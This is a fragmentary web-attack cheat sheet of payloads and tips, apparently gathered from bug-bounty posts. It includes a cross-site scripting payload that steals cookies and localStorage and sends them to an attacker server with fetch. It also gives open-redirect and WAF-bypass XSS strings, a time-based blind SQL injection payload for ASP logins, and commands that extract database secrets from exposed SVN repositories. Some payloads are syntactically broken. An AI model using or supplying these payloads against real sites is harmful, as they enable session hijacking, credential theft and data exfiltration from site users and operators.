Forbidden Payloads
Add a return parameter (can also be used for open redirection):
https://xyz.com/?return=javascript://%250Alert(document.location=document.cookie)
https://xyz.com/?return=https://google.com
https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt
📌Here is An XSS Payload that Steals both Cookies and Local Storage Data 🤯
📌Payload <svg/onload='const url = https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}
; fetch(url);'>"
🚨Discovering DB secrets in SVN repository🚨
Run ./dirsearch.py -u target -e php,html,js,xml -x 500,403
Found http://url.com/.svn/
Clone & use SVN-Extractor
Run ./svn-extractor.py --url http://url.com --match database.php
⚡ Result in output containing secret.
ASP blind SQL Injection in a Login page⚡️ 👉 (Blind-Boolean method)
✅ Payload: ';%20waitfor%20delay%20'0:0:6'%20--%20
Payload for adding a tag or skill:
<a/href="javascript:alert(document.cookie)">ClickMe
XSS payload : <img src%3Dx onerror%3D"\u0061\u006C\u0065\u0072\u0074 (1)">
Bypass 403
both %0d and %0a work
CVE-2022-22978 - Spring Security Admin Bypass PoC
DOM XSS in AVG
📌If you find a file upload function for an image, try introducing an image with XSS in the filename like so 👇
Tech 1:
/?xss=<svg/onload=eval('
+URL)>#';alert(document.domain)
cloudflare bypass
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
CRLF